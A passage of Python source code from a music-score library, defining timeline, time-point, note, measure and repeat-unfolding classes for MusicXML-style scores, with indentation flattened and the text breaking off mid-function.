from scipy.interpolate import InterpolatedUnivariateSpline
from collections import defaultdict
import logging
import operator
import itertools
from numbers import Number
from ..utils.lang_utils import cached_property, ComparableMixin, iter_subclasses
from ..utils.container_utils import partition
# from annotation_tokenizer import parse_words # tokenizer, TokenizeException
# the score ontology for longer scores requires a high recursion limit
# increase when needed
sys.setrecursionlimit(100000)
logging.basicConfig()
LOGGER = logging.getLogger(__name__)
NON_ALPHA_NUM_PAT = re.compile(ur'\W', re.UNICODE)
from scipy.interpolate import interp1d
# this produces less rounding error than scipy.interpolate.interp1d
# def interp1d_old(x, y):
# return InterpolatedUnivariateSpline(x, y, k=1)
# def my_interp1d(x, y):
# def f(x_new):
# if not hasattr(x_new, "__len__"):
# x_new = np.array([x_new])
# # output values
# v = np.empty(len(x_new))
# # insert index
# i = np.searchsorted(x, x_new)
# same = x[i] == x_new
# v[same] = y[i[same]]
# if np.sum(same) < len(x_new):
# i = i[~same]
# v[~same] = y[i-1] + (y[i] - y[i - 1]) * ( x_new[~same] - x[i - 1]) / (x[i] - x[i - 1])
# # np.savetxt('/tmp/nsame.txt', np.column_stack((x_new[~same], x[i-1], x[i], y[i-1], y[i], v[~same])), fmt='%.3f')
# return v
# return f
def kahan_cumsum(x):
"""
Return the cumsum of a sequence of numbers `x` using the Kahan sum algorithm
to bound numerical error.
Parameters
----------
x: iterable over numbers
A sequence of numbers to be cumsummed
Returns
-------
ndarray: The cumsum of the elements in `x`
"""
x = np.asarray(x)
cumulator = np.zeros_like(x)
compensation = 0.0
cumulator[0] = x[0]
for i in range(1, len(x)):
y = x[i] - compensation
t = cumulator[i - 1] + y
compensation = (t - cumulator[i - 1]) - y
cumulator[i] = t
return cumulator
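# Example (editor's sketch): the running compensation keeps the accumulated
# rounding error bounded, e.g.
#   kahan_cumsum([0.1] * 10)[-1]
# is (up to one ulp) 1.0, whereas a naive running sum may drift slightly.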
def divide_outside_cumsum(X):
"""
this computes np.cumsum(np.diff(X[:, 0]) / X[:-1, 1]), but produces fewer
rounding errors when X.dtype == int, by moving the division operation out of
the cumsum.
"""
diff = np.diff(X[:, 0])
num = kahan_cumsum([diff[i] * np.prod(X[:i, 1]) * np.prod(X[i + 1:-1, 1])
for i in range(len(X) - 1)])
den = np.prod(X[:-1, 1])
return num / np.float(den)
def _symbolic_to_numeric_duration(symbolic_dur, divs):
label_durs = {
'long': 16,
'breve': 8,
'whole': 4,
'half': 2,
'quarter': 1,
'eighth': 1./2,
'16th': 1./4,
'32nd': 1./8.,
'64th': 1./16,
'128th': 1./32,
'256th': 1./64
}
dot_multipliers = (1, 1 + 1./2, 1 + 3./4, 1 + 7./8)
numdur = divs * label_durs[symbolic_dur.get('type', 'quarter')]
numdur *= dot_multipliers[symbolic_dur.get('dots', 0)]
numdur *= float(symbolic_dur.get('normal_notes', 1)) / symbolic_dur.get('actual_notes', 1)
return numdur
def symbolic_to_numeric_duration(symbolic_durs, divs):
numdur = 0
for symbolic_dur in symbolic_durs:
numdur += _symbolic_to_numeric_duration(symbolic_dur, divs)
return numdur
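# Worked example (editor's addition): with divisions = 480 per quarter note,
# each component of a (possibly tied) symbolic duration is converted as above;
# a dotted eighth gives 480 * (1/2) * 1.5 = 360 divisions, and an eighth inside
# a triplet (actual_notes=3, normal_notes=2) gives 480 * (1/2) * 2/3 = 160.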
# def preprocess_direction_name(l):
# try:
# to_remove = set(('COMMA','CARLOSCOMMENT', 'PARENOPEN', 'PARENCLOSE', 'TEMPOHINT'))
# tokens = tokenizer.tokenize(l)
# parts = []
# for t in tokens:
# if t.type in ('ROMAN_NUMBER', 'TEMPOHINT', 'PRIMO'):
# parts.append(t.value)
# elif t.type in to_remove:
# continue
# else:
# parts.append(t.type.lower())
# return '_'.join(parts)
# except TokenizeException as e:
# return l.lower().replace(' ', '_')
# def preprocess_direction_fallback(l):
# """
# try to convert direction name into a normalized form; some
# translation takes place to correct for common abbreviations
# (e.g. rall. for rallentando), and OCR errors; furthermore the
# string will be converted to lowercase and spaces are replaced by
# underscores
# this function is obsolete and should only be used if the ply module is not available
# Parameters
# ----------
# l : str
# a direction name
# Returns
# -------
# str
# a string containing the processed version of `l`
# """
# # TODO:
# # Lento Sostenuto -> lento
# # poco rall. -> rallentando
# # poco ritenuto -> ritenuto
# # pp e poco ritenuto -> ritenuto
# # for simplicity of equiv replacements,
# # do more normalization:
# # lkey = ln.replace(',._-','')
# lsl = l.strip().lower()
# lkey = NON_ALPHA_NUM_PAT.sub(ur'', lsl)
# # print(r, l)
# # tr = string.ascii_lowercase + '_'
# # delete_table = string.maketrans(tr, ' ' * len(tr))
# # ln = l.strip().lower()
# # lkey = ln.translate(None, delete_table)
# equivalences = {u'dim': u'diminuendo',
# u'dimin': u'diminuendo',
# u'diminuend': u'diminuendo',
# u'diminuendosempre': u'diminuendo',
# u'dirn': u'diminuendo', # OCR errors
# u'cresc': u'crescendo',
# u'cre': u'crescendo',
# u'ten': u'tenuto',
# u'cr': u'crescendo',
# u'rall': u'rallentando',
# u'espress': u'espressivo',
# u'pocoritenuto': u'ritenuto',
# u'pocoriten': u'ritenuto',
# u'pocorubato': u'ritardando',
# u'pocorall': u'rallentando',
# u'pocorallentando': u'rallentando',
# u'pizz': u'pizzicato',
# u'atenepo': u'a_tempo',
# u'rallentandomolto': u'rallentando',
# u'appasionato': u'appassionato',
# u'legatissizno': u'legatissimo',
# u'rallent': u'rallentando',
# u'rallent': u'rallentando',
# u'rit': u'ritardando',
# u'ritpocoapoco': u'ritardando',
# u'ritard': u'ritardando',
# u'riten': u'ritenuto',
# u'rinf': u'rinforzando',
# u'rinforz': u'rinforzando',
# u'smorz': u'smorzando',
# u'tenute': u'tenuto',
# u'pi\xf9_lento': u'piu_lento'
# }
# # print('lkey', lkey, equivalences.get(lkey))
# return equivalences.get(lkey, NON_ALPHA_NUM_PAT.sub(ur'_', lsl))
class TimeLine(object):
"""
The `TimeLine` class collects `TimePoint` objects in a doubly
linked list fashion (as well as in an array). Once all `TimePoint`
objects have been added, the TimeLine can be locked (that is, no
more `TimePoint` objects can be added), in order to allow for
caching of property values (without locking, the correctness of the
cached values cannot be guaranteed).
Parameters
----------
No parameters
Attributes
----------
points : numpy array of TimePoint objects
a numpy array of TimePoint objects.
locked : boolean
if the timeline is locked, no points can be added until
`unlock()` is called.
"""
def __init__(self):
self.points = np.array([], dtype=TimePoint)
self.locked = False
def lock(self):
"""
lock the time line; no points can be added until `unlock` is called
"""
self.locked = True
def unlock(self):
"""
unlock the time line; points can be added until `lock` is called
"""
self.locked = False
def link(self):
"""
double link all points in the time line
"""
for i in range(len(self.points) - 1):
self.points[i].next = self.points[i + 1]
self.points[i + 1].prev = self.points[i]
def add_point(self, tp):
"""
add `TimePoint` object `tp` to the time line
"""
if self.locked:
LOGGER.warning('Attempt to mutate locked TimeLine object')
else:
N = len(self.points)
i = np.searchsorted(self.points, tp)
if not (i < N and self.points[i].t == tp.t):
self.points = np.insert(self.points, i, tp)
if i > 0:
self.points[i - 1].next = self.points[i]
self.points[i].prev = self.points[i - 1]
if i < len(self.points) - 1:
self.points[i].next = self.points[i + 1]
self.points[i + 1].prev = self.points[i]
def get_point(self, t):
"""
return the `TimePoint` object with time `t`, or None if there
is no such object
"""
N = len(self.points)
i = np.searchsorted(self.points, TimePoint(t))
if i < N and self.points[i].t == t:
return self.points[i]
else:
return None
def get_or_add_point(self, t):
"""
return the `TimePoint` object with time `t`; if there is no
such object, create it, add it to the time line, and return
it
:param t: time value `t` (float)
:returns: a TimePoint object with time `t`
"""
tp = self.get_point(t)
if tp is None:
tp = TimePoint(t)
self.add_point(tp)
return tp
def add_starting_object(self, t, o):
"""
add object `o` as an object starting at time `t`
"""
self.get_or_add_point(t).add_starting_object(o)
def add_ending_object(self, t, o):
"""
add object `o` as an object ending at time `t`
"""
self.get_or_add_point(t).add_ending_object(o)
def get_all_of_type(self, cls, start=None, end=None, include_subclasses=False):
"""
return all objects of type `cls`
"""
if start is not None:
if not isinstance(start, TimePoint):
start = TimePoint(start)
start_idx = np.searchsorted(
self.points, start, side='left')
else:
start_idx = 0
if end is not None:
if not isinstance(end, TimePoint):
end = TimePoint(end)
end_idx = np.searchsorted(self.points, end, side='left')
else:
end_idx = len(self.points)
r = []
for tp in self.points[start_idx: end_idx]:
r.extend(tp.get_starting_objects_of_type(cls, include_subclasses))
return r
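# Usage sketch (editor's addition; `part` is an illustrative ScorePart
# instance): collect all Note objects between two division times, including
# any subclasses of Note.
#   notes = part.timeline.get_all_of_type(Note, start=0, end=960,
#                                         include_subclasses=True)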
class TimePoint(ComparableMixin):
"""
A TimePoint represents an instant in Time.
Parameters
----------
t : number
Time point of some event in/element of the score, where the unit
of a time point is the <divisions> as defined in the musicxml file,
more precisely in the corresponding score part.
Represents the absolute time of the time point, also used
for ordering TimePoint objects w.r.t. each other.
label : str, optional. Default: ''
Attributes
----------
t : number
label : str
starting_objects : dictionary
a dictionary where the musical objects starting at this
time are grouped by class.
ending_objects : dictionary
a dictionary where the musical objects ending at this
time are grouped by class.
* `prev`: the preceding time instant (or None if there is none)
* `next`: the succeeding time instant (or None if there is none)
The `TimeLine` class stores sorted TimePoint objects in an array
under TimeLine.points, as well as doubly linked (through the
`prev` and `next` attributes). The `TimeLine` class also has
functionality to add, remove, lock, and unlock the TimePoints.
"""
def __init__(self, t, label=''):
self.t = t
self.label = label
self.starting_objects = defaultdict(list)
self.ending_objects = defaultdict(list)
def __iadd__(self, value):
assert isinstance(value, Number)
self.t += value
return self
def __isub__(self, value):
assert isinstance(value, Number)
self.t -= value
return self
def __add__(self, value):
assert isinstance(value, Number)
new = copy(self)
new += value
return new
def __sub__(self, value):
assert isinstance(value, Number)
new = copy(self)
new -= value
return new
def __unicode__(self):
return u'Timepoint {0}: {1}'.format(self.t, self.label)
def add_starting_object(self, obj):
"""
add object `obj` to the list of starting objects
"""
obj.start = self
self.starting_objects[type(obj)].append(obj)
def add_ending_object(self, obj):
"""
add object `obj` to the list of ending objects
"""
obj.end = self
self.ending_objects[type(obj)].append(obj)
def get_starting_objects_of_type(self, otype, include_subclasses=False):
"""
return all objects of type `otype` that start at this time point
"""
if include_subclasses:
return self.starting_objects[otype] + \
list(itertools.chain(*(self.starting_objects[subcls]
for subcls in iter_subclasses(otype))))
else:
return self.starting_objects[otype]
def get_ending_objects_of_type(self, otype, include_subclasses=False):
"""
return all objects of type `otype` that end at this time point
"""
if include_subclasses:
return self.ending_objects[otype] + \
list(itertools.chain(*(self.ending_objects[subcls]
for subcls in iter_subclasses(otype))))
else:
return self.ending_objects[otype]
def get_prev_of_type(self, otype, eq=False):
"""
return the object(s) of type `otype` that start at the latest
time before this time point (or at this time point, if `eq` is True)
"""
if eq:
value = self.get_starting_objects_of_type(otype)
if len(value) > 0:
return value[:]
return self._get_prev_of_type(otype)
def _get_prev_of_type(self, otype, eq=False):
if self.prev is None:
return []
else:
r = self.prev.get_starting_objects_of_type(otype)
if r != []:
return r[:]
else:
return self.prev._get_prev_of_type(otype)
def get_next_of_type(self, otype, eq=False):
"""
return the object(s) of type `otype` that start at the earliest
time after this time point (or at this time point, if `eq` is True)
"""
if eq:
value = self.get_starting_objects_of_type(otype)
if len(value) > 0:
return value[:]
return self._get_next_of_type(otype)
def _get_next_of_type(self, otype, eq=False):
if self.next is None:
return []
else:
r = self.next.get_starting_objects_of_type(otype)
if r != []:
return r[:]
else:
return self.next._get_next_of_type(otype)
@cached_property
def next(self):
"""
return the next time point, or None if there is no such
object; this property will be set when the object is part of a
time line
"""
return None
@cached_property
def prev(self):
"""
return the previous time point, or None if there is no such
object; this property will be set when the object is part of a
time line
"""
return None
def _cmpkey(self):
"""
This method returns the value to be compared
(code for that is in the ComparableMixin class)
"""
return self.t
__hash__ = _cmpkey  # hash on the comparison key, i.e. the time value
class TimedObject(object):
"""
class that represents objects that may have a start and an end
point.
Used as super-class for classes representing different types of
objects in a (printed) score.
"""
def __init__(self):
self.start = None
self.end = None
# intermediate time points
self.intermediate = []
class Page(TimedObject):
def __init__(self, nr=0):
super(Page, self).__init__()
self.nr = nr
def __unicode__(self):
return u'page {0}'.format(self.nr)
class System(TimedObject):
def __init__(self, nr=0):
super(System, self).__init__()
self.nr = nr
def __unicode__(self):
return u'system {0}'.format(self.nr)
class Slur(TimedObject):
"""
Parameters
----------
voice : number
the voice the slur corresponds to, this is given by a
<voice>number_of_voice</voice> tag inside <note> ... </note>.
"""
def __init__(self, voice):
super(Slur, self).__init__()
self.voice = voice
def __unicode__(self):
return u'slur at voice {0} (ends at {1})'.format(self.voice, self.end and self.end.t)
class Repeat(TimedObject):
def __init__(self):
super(Repeat, self).__init__()
def __unicode__(self):
return u'Repeat (from {0} to {1})'.format(self.start and self.start.t, self.end and self.end.t)
class DaCapo(TimedObject):
def __init__(self):
super(DaCapo, self).__init__()
def __unicode__(self):
return u'Dacapo' # (at {0} to {1})'.format(self.start.t, self.end.t)
class Fine(TimedObject):
def __init__(self):
super(Fine, self).__init__()
def __unicode__(self):
return u'Fine'
class Fermata(TimedObject):
def __init__(self):
super(Fermata, self).__init__()
def __unicode__(self):
return u'Fermata'
class Ending(TimedObject):
"""
Object that represents one part of a 1---2--- type ending of a
musical passage (aka Volta brackets).
"""
def __init__(self, number):
super(Ending, self).__init__()
self.number = number
def __unicode__(self):
return u'Ending (from {0} to {1})'.format(self.start.t, self.end.t)
class Measure(TimedObject):
"""
Attributes
----------
number : number
the number of the measure. (directly taken from musicxml file?)
page :
system :
upbeat : boolean
"""
def __init__(self):
super(Measure, self).__init__()
self.number = None
self.page = None
self.system = None
def __unicode__(self):
return u'measure {0} at page {1}, system {2}'.format(self.number, self.page, self.system)
def get_measure_duration(self, quarter=False):
"""
Parameters
----------
quarter : boolean, optional. Default: False
if True, return the duration in quarter notes; otherwise return it
in beats of the current time signature denominator.
Returns
-------
number
the duration of the measure
"""
assert self.start.next is not None, LOGGER.error(
'Measure has no successor')
divs = self.start.next.get_prev_of_type(Divisions)
ts = self.start.next.get_prev_of_type(TimeSignature)
nextm = self.start.get_next_of_type(Measure)
assert len(divs) > 0
assert len(ts) > 0
assert len(nextm) > 0
measure_dur = nextm[0].start.t - self.start.t
beats = ts[0].beats
beat_type = ts[0].beat_type
div = float(divs[0].divs)
if quarter:
return measure_dur / div
else:
return beat_type * measure_dur / (4. * div)
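# Worked example (editor's addition): with divisions = 256 per quarter and a
# 6/8 measure spanning 768 divisions, get_measure_duration(quarter=True)
# returns 768 / 256 = 3.0 quarters, while quarter=False returns
# 8 * 768 / (4 * 256) = 6.0 eighth-note beats.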
@property
def upbeat(self):
"""Returns True if the duration of the measure
is equal to the expected duration (based on
divisions and time signature).
NOTE: What does "expected duration" refer to here?
WARNING: this property does not work reliably to detect
incomplete measures in the middle of the piece
Returns
-------
boolean
"""
assert self.start.next is not None, LOGGER.error(
'ScorePart is empty')
divs = self.start.next.get_prev_of_type(Divisions)
ts = self.start.next.get_prev_of_type(TimeSignature)
nextm = self.start.get_next_of_type(Measure)
invalid = False
if len(divs) == 0:
LOGGER.warning('ScorePart specifies no divisions')
invalid = True
if len(ts) == 0:
LOGGER.warning('ScorePart specifies no time signatures')
invalid = True
if len(nextm) == 0:
LOGGER.warning('ScorePart has just one measure')
invalid = True
if invalid:
LOGGER.warning(
'upbeat could not be determined properly, assuming no upbeat')
return False
measure_dur = nextm[0].start.t - self.start.t
beats = ts[0].beats
beat_type = ts[0].beat_type
div = float(divs[0].divs)
# this will return a boolean, so either True or False
return beat_type * measure_dur / (4 * div * beats) % 1.0 > 0.0
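# Worked example (editor's addition): in 3/4 with divisions = 256, a full
# measure spans 768 divisions, so 4 * 768 / (4 * 256 * 3) = 1.0, whose
# fractional part is 0, and the property is False; a two-quarter pickup spans
# 512 divisions, giving 4 * 512 / (4 * 256 * 3) ~ 0.667, fractional part > 0,
# so the property is True.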
class TimeSignature(TimedObject):
"""
Parameters
----------
beats : number
the numerator of the time signature
beat_type : number
the denominator of the time signature
"""
def __init__(self, beats, beat_type):
super(TimeSignature, self).__init__()
self.beats = beats
self.beat_type = beat_type
def __unicode__(self):
return u'time signature: {0}/{1}'.format(self.beats, self.beat_type)
class Divisions(TimedObject):
"""
represents <divisions>xxx</divisions> that are used inside a measure
to set the length of a quarter note (xxx here is the value for a quarter
note, e.g. 256). This element usually is present in the first measure
of each score part.
"""
def __init__(self, divs):
super(Divisions, self).__init__()
self.divs = divs
def __unicode__(self):
return u'divisions: quarter={0}'.format(self.divs)
class Tempo(TimedObject):
def __init__(self, bpm):
super(Tempo, self).__init__()
self.bpm = bpm
def __unicode__(self):
return u'tempo: bpm={0}'.format(self.bpm)
class KeySignature(TimedObject):
"""
Parameters
----------
fifths : number
the number of sharps (positive) or flats (negative)
mode :
the mode of the key (e.g. major or minor)
"""
def __init__(self, fifths, mode):
super(KeySignature, self).__init__()
self.fifths = fifths
self.mode = mode
def __unicode__(self):
return u'key signature: fifths={0}, mode={1}'.format(self.fifths, self.mode)
class Transposition(TimedObject):
"""
represents a <transpose> tag that tells how to change all (following)
pitches of that part to put it to concert pitch (i.e. sounding pitch).
Parameters
----------
diatonic : number
chromatic : number
the number of semi-tone steps to add or subtract to the pitch to
get to the (sounding) concert pitch.
"""
def __init__(self, diatonic, chromatic):
super(Transposition, self).__init__()
self.diatonic = diatonic
self.chromatic = chromatic
def __unicode__(self):
return u'transposition: diatonic={0}, chromatic={1}'.format(self.diatonic, self.chromatic)
class Words(TimedObject):
"""
Parameters
----------
text : str
"""
def __init__(self, text):
super(Words, self).__init__()
self.text = text
def __str__(self):
return self.__unicode__().encode('utf8')
def __unicode__(self):
return u'{}: {}'.format(type(self).__name__, self.text)
class Direction(TimedObject):
"""
"""
# labels = []
# patterns = []
def __init__(self, text):
self.text = text
self.start = None
self.end = None
def __str__(self):
return self.__unicode__().encode('utf8')
def __unicode__(self):
return u'{}: {}'.format(type(self).__name__, self.text)
class TempoDirection(Direction): pass
class DynamicTempoDirection(TempoDirection):
def __init__(self, text):
Direction.__init__(self, text)
self.intermediate = []
class ConstantTempoDirection(TempoDirection): pass
class ResetTempoDirection(ConstantTempoDirection): pass
class LoudnessDirection(Direction): pass
class DynamicLoudnessDirection(LoudnessDirection):
def __init__(self, text):
Direction.__init__(self, text)
self.intermediate = []
class ConstantLoudnessDirection(LoudnessDirection): pass
class ImpulsiveLoudnessDirection(LoudnessDirection): pass
class Note(TimedObject):
"""
represents a note.
Parameters
----------
step : str
the basic pitch class, like 'C', 'D', 'E', etc.
alter: integer
number of semitones by which to alter the note from the basic
pitch class given by `step`.
Note that the musicxml standard in principle allows for this to
be a float number for microtones (micro-intonation). In Midi this
would/could then translate to a pitch-bend.
octave : integer
the octave where octave 4 is the one having middle C (C4).
voice : integer, optional. Default: None
id : integer, optional. Default: None
...
Attributes
----------
previous_notes_in_voice :
simultaneous_notes_in_voice :
next_notes_in_voice :
midi_pitch : integer
morphetic_pitch :
alter_sign :
duration :
"""
def __init__(self, step, alter, octave, voice=None, id=None,
symbolic_duration=None,
grace_type=None, steal_proportion=None,
staccato=False, fermata=False, accent=False,
coordinates=None, staff=None):
super(Note, self).__init__()
self.step = step
if alter not in (None, 0, 1, 2, 3, -1, -2, -3):
print('alter', step, alter, octave)
raise Exception()
if alter == 0:
alter = None
self.alter = alter
self.octave = octave
self.voice = voice
self.id = id
self.grace_type = grace_type
self.steal_proportion = steal_proportion
self.staccato = staccato
self.fermata = fermata
self.accent = accent
self.staff = staff
self.coordinates = coordinates
self.symbolic_durations = []
if symbolic_duration is not None:
self.symbolic_durations.append(symbolic_duration)
@property
def previous_notes_in_voice(self):
n = self
while True:
nn = n.start.get_prev_of_type(Note)
if nn == []:
return nn
else:
voice_notes = [m for m in nn if m.voice == self.voice]
if len(voice_notes) > 0:
return voice_notes
n = nn[0]
@property
def simultaneous_notes_in_voice(self):
return [m for m in self.start.starting_objects[Note]
if m.voice == self.voice and m != self]
@property
def next_notes_in_voice(self):
n = self
while True:
nn = n.start.get_next_of_type(Note)
if nn == []:
return nn
else:
voice_notes = [m for m in nn if m.voice == self.voice]
if len(voice_notes) > 0:
return voice_notes
n = nn[0]
@property
def midi_pitch(self):
"""
the midi pitch value of the note (MIDI note number).
C4 (middle C, in german: c') is note number 60.
Returns
-------
integer
the note's pitch as MIDI note number.
"""
base_class = {'c': 0, 'd': 2, 'e': 4, 'f': 5,
'g': 7, 'a': 9, 'b': 11}[self.step.lower()] + (self.alter or 0)
return (self.octave + 1) * 12 + base_class
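# Worked examples (editor's addition): C4 (step 'C', no alteration, octave 4)
# gives (4 + 1) * 12 + 0 = 60, and A4 gives (4 + 1) * 12 + 9 = 69.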
@property
def morphetic_pitch(self):
"""
the morphetic value of the note, i.e. a single integer.
It corresponds to the (vertical) position of the note in
the barline system.
Returns
-------
integer
"""
base_class = {'c': 0, 'd': 1, 'e': 2, 'f': 3,
'g': 4, 'a': 5, 'b': 6}[self.step.lower()]
octave_number = {0: 32, 1: 39, 2: 46, 3: 53,
4: 60, 5: 67, 6: 74, 7: 81,
8: 89}[self.octave]
return octave_number + base_class
@property
def alter_sign(self):
"""
the alteration of the note
Returns
-------
str
"""
return {None: ' ', 1: '#', 2: 'x', -1: 'b', -2: 'bb'}[self.alter]
@property
def duration(self):
"""
the duration of the note in divisions
Returns
-------
number
"""
try:
return self.end.t - self.start.t
except:
LOGGER.warn('no end time found for note')
return 0
@property
def duration_from_symbolic(self):
divs = self.start.get_prev_of_type(Divisions, True)
if len(divs) == 0:
div = 1
else:
div = divs[0].divs
# TODO: it is theoretically possible that the divisions change
# in between tied notes. The current implementation assumes this does not happen.
return symbolic_to_numeric_duration(self.symbolic_durations, div)
def __unicode__(self):
return u'{0}{1}{2} ({8}-{9}, midi: {3}, duration: {5}, voice: {4}, id: {6}, {7})'\
.format(self.alter_sign, self.step, self.octave,
self.midi_pitch, self.voice, self.duration,
self.id or '', self.grace_type if self.grace_type else '',
self.start and self.start.t, self.end and self.end.t)
def get_all_score_parts(constituents):
"""
From a list whose elements are either ScorePart objects or
PartGroup objects, return an ordered list of ScorePart objects.
Parameters:
-----------
constituents : iterable
a list of ScorePart/PartGroup objects
Returns:
--------
iterable
a list of all ScorePart objects embedded in `constituents`
"""
return [score_part for constituent in constituents
for score_part in
((constituent,) if isinstance(constituent, ScorePart)
else get_all_score_parts(constituent.constituents))]
class PartGroup(object):
"""
represents a <part-group ...> </...> where instruments are grouped.
Note that a part grouped is "started" and "stopped" with according
attributes inside the respective elements.
Parameters
----------
grouping_symbol : str OR None, optional
the symbol used for grouping instruments, a <group-symbol> element,
possibilities are:
- 'brace' (opening curly brace, should group 2 same instruments,
e.g. 2 horns, or left + right hand on piano)
- 'square' (opening square bracket, should have same function as
the brace.)
- 'bracket' (opening square bracket, should group instruments
of the same category, such as all woodwinds.)
Note that there is supposed to be a hierarchy between these,
like this: a bracket is supposed to embrace one or multiple
braces or squares.
Attributes
----------
grouping_symbol : str OR None
constituents : list of PartGroup objects
parent :
number :
score_parts : list of ScorePart objects
a list of all ScorePart objects in this PartGroup
"""
def __init__(self, grouping_symbol=None, name=None):
self.grouping_symbol = grouping_symbol
self.constituents = []
self.name = name
self.parent = None
self.number = None
@property
def score_parts(self):
return get_all_score_parts(self.constituents)
def pprint(self, l=0):
if self.name is not None:
name_str = u' / {0}'.format(self.name)
else:
name_str = u''
s = [u' ' * l + u'{0}{1}'.format(self.grouping_symbol, name_str)]
for ch in self.constituents:
s.append(ch.pprint(l + 1))
return u'\n'.join(s)
class ScoreVariant(object):
def __init__(self, start_time=0):
self.t_unfold = start_time
self.segments = []
def add_segment(self, start, end):
self.segments.append((start, end, self.t_unfold))
self.t_unfold += (end.t - start.t)
def get_segments(self):
"""return segment (start, end, offset) information for each of
the segments in the score variant.
PHENICX NOTE: these numbers can be inserted directly into the
ScoreVariantSequence table, as "ScoreStartBeat",
"ScoreStopBeat", and "Offset", respectively
"""
return [(s.t, e.t, 0 if i > 0 else o)
for i, (s, e, o) in enumerate(self.segments)]
def clone(self):
clone = ScoreVariant(self.t_unfold)
clone.segments = self.segments[:]
return clone
class ScorePart(object):
"""
Represents a whole score part, e.g. all notes of one single instrument
or 2 instruments written in the same staff.
Note that there may be more than one staff per score part; vice versa,
in the printed score, there may be more than one score part's notes
in the same staff (such as two flutes in one staff, etc).
Parameters
----------
part_id : str
the id of the part (<score-part id="P1">), will look
like 'P1' for part 1, etc.
tl : TimeLine object OR None, optional
Attributes
----------
part_id : str
timeline : TimeLine object
part_name : str
as taken from the musicxml file
part_abbreviation : str
as taken from the musicxml file
notes :
notes_unfolded :
beat_map : scipy interpolate interp1d object
the timeline on a beat basis, i.e. defined on the currently
present time signature's denominator (may vary throughout the score).
Each timepoint of the timeline is expressed as a (fractional)
beat number.
quarter_map : scipy interpolate interp1d object
the timeline on a quarter note basis. Each timepoint of
the timeline is expressed as a (fraction of a) quarter
note.
"""
def __init__(self, part_id, tl=None):
self.part_id = part_id
self.timeline = TimeLine() if tl is None else tl
self.parent = None
self.part_name = None
self.part_abbreviation = None
@property
def part_names(self):
# get instrument name parts recursively
chunks = []
if self.part_name is not None:
chunks.append(self.part_name)
yield self.part_name
part = self.parent
while part is not None:
if part.name is not None:
chunks.insert(0, part.name)
yield u' '.join(chunks)
part = part.parent
def make_score_variants(self):
"""
Create a list of ScoreVariant objects, each representing a
distinct way to unfold the score, based on the repeat
structure.
Returns
-------
list
a list of ScoreVariant objects, one per way of unfolding the repeats
"""
LOGGER.warning(('Generation of repeat structures involving da '
'capo/fine/coda/segno directions is not (properly) '
'implemented yet'))
import pdb
# pdb.set_trace()
repeats = self.timeline.get_all_of_type(Repeat)
# t_score is used to keep the time in the score
t_score = TimePoint(0)
# the last time instance in the piece
end_point = self.timeline.points[-1]
# t_unfold is used to keep the time in the score variant
# t_unfold = 0
# times will aggregate the triples that make up the result
times = []
# flag that tells... if we've reached a "da capo" sign in the
# score
reached_dacapo = False
svs = [ScoreVariant()]
# each repeat holds start and end time of a score interval to
# be repeated
for repeat in repeats:
new_svs = []
for sv in svs:
# is the start of the repeat after our current score
# position?
if repeat.start > t_score:
# yes: add the tuple (t_score, repeat.start) to the
# result this is the span before the interval that is
# to be repeated
# times.append((t_score, repeat.start, t_unfold))
sv.add_segment(t_score, repeat.start)
# get any "endings" (e.g. 1 / 2 volta) of the repeat
# (there are not supposed to be more than one)
endings = repeat.end.get_ending_objects_of_type(Ending)
# create a new ScoreVariant for the repetition (sv
# will be the score variant where this repeat is
# played only once)
new_sv = sv.clone()
# is there an ending?
if len(endings) > 0:
# yes
ending = endings[0]
# add the first occurrence of the repeat
sv.add_segment(repeat.start, ending.start)
# we are in the second iteration of the repeat, so
# only add the interval of the repeat up to the ending
# (rather than up to the end of the repeat)
# add the first occurrence of the repeat
new_sv.add_segment(repeat.start, repeat.end)
new_sv.add_segment(repeat.start, ending.start)
else:
# add the first occurrence of the repeat
sv.add_segment(repeat.start, repeat.end)
# no: add the full interval of the repeat (the second time)
new_sv.add_segment(repeat.start, repeat.end)
new_sv.add_segment(repeat.start, repeat.end)
# this repeat has been handled, update the score time
t_score = repeat.end
# add both score variants
new_svs.append(sv)
new_svs.append(new_sv)
svs = new_svs
# are we at the end of the piece already?
if t_score < end_point:
# no, append the interval from the current score
# position to the end of the piece
for sv in svs:
sv.add_segment(t_score, end_point)
return svs
def test_timeline(self):
"""
Test if all ending objects have occurred as starting object as
well.
"""
s = set()
for tp in self.timeline.points:
for k, oo in tp.starting_objects.items():
for o in oo:
s.add(o)
for k, oo in tp.ending_objects.items():
for o in oo:
assert o in s
s.remove(o)
LOGGER.info('Timeline is OK')
def _make_repeat_structure(self):
"""
Return a list of sequence times based on the repeat structure
of the piece, that can be used to create an unfolded timeline.
Returns
-------
list
A list of triples (s, e, o), where s is the score start
time of a segment, e is the score end time of a segment,
and o is the absolute (score variant) start time of that
segment in the unfolded score
"""
LOGGER.warning('Generation of repeat structures involving da'
' capo/fine/coda/segno directions is not (properly)'
' implemented yet')
repeats = self.timeline.get_all_of_type(Repeat)
dacapos = self.timeline.get_all_of_type(DaCapo)
fines = self.timeline.get_all_of_type(Fine)
if len(dacapos) > 0:
dacapo = dacapos[0]
else:
dacapo = None
if len(fines) > 0:
fine = fines[0]
else:
fine = None
# t_score is used to keep the time in the score
t_score = TimePoint(0)
# the last time instance in the piece
end_point = self.timeline.points[-1]
# t_unfold is used to keep the time in the score variant
t_unfold = 0
# times will aggregate the triples that make up the result
times = []
# flag that tells... if we've reached a "da capo" sign in the
# score
reached_dacapo = False
# each repeat holds start and end time of a score interval to
# be repeated
for repeat in repeats:
# is the start of the repeat after our current score
# position?
if repeat.start > t_score:
# yes: add the tuple (t_score, repeat.start) to the
# result this is the span before the interval that is
# to be repeated
times.append((t_score, repeat.start, t_unfold))
# increase t_unfold by the interval [t_score,
# repeat.start]
t_unfold += (repeat.start.t - t_score.t)
# add the first occurrence of the repeat
times.append((repeat.start, repeat.end, t_unfold))
# update t_unfold accordingly
t_unfold += (repeat.end.t - repeat.start.t)
# is there a da capo within the repeat interval?
if dacapo is not None and repeat.start < dacapo.start <= repeat.end:
# yes: set the reached_dacapo flag
reached_dacapo = True
# play the second time only up to the da capo, and
# stop processing further repeats
times.append((repeat.start, dacapo.start, t_unfold))
# update t_unfold accordingly
t_unfold += (dacapo.start.t - repeat.start.t)
break
# get any "endings" (e.g. 1 / 2 volta) of the repeat
# (there are not supposed to be more than one)
endings = repeat.end.get_ending_objects_of_type(Ending)
# is there an ending?
if len(endings) > 0:
# yes
ending = endings[0]
# we are in the second iteration of the repeat, so
# only add the interval of the repeat up to the ending
# (rather than up to the end of the repeat)
times.append((repeat.start, ending.start, t_unfold))
# update t_unfold accordingly
